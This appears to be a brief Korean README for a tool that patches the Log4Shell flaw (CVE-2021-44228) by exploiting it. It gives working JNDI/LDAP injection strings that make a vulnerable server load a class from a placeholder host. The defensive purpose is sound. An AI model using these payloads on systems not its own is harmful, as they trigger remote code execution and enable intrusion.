
취약점 자체를 악용하여 CVE-2021-44228을 핫패치합니다.
취약점 자체를 악용하여 CVE-2021-44228을 핫패치합니다.
CVE-2021-44228에 취약할 가능성이 있는 곳에 다음 코드를 주입하세요,
${jndi:ldap://your-own-server/patch}
패치 과정에서 MITM 공격을 방지하기 위해 다음 페이로드를 권장하지만, 구버전 Java와의 호환성은 떨어집니다.
${jndi:ldap://your-own-server/any_string_except_patch}
최신 릴리즈 다운로드
Hotfix.class를 자신의 서버에서 호스팅하려면 시스템 환경 변수 LOG4J_HOTFIX_HTTP_PATH와 LOG4J_HOTFIX_HTTPS_PATH를 지정하세요.
Hotfix.java는 최대 호환성을 위해 JDK6으로 컴파일되어야 합니다.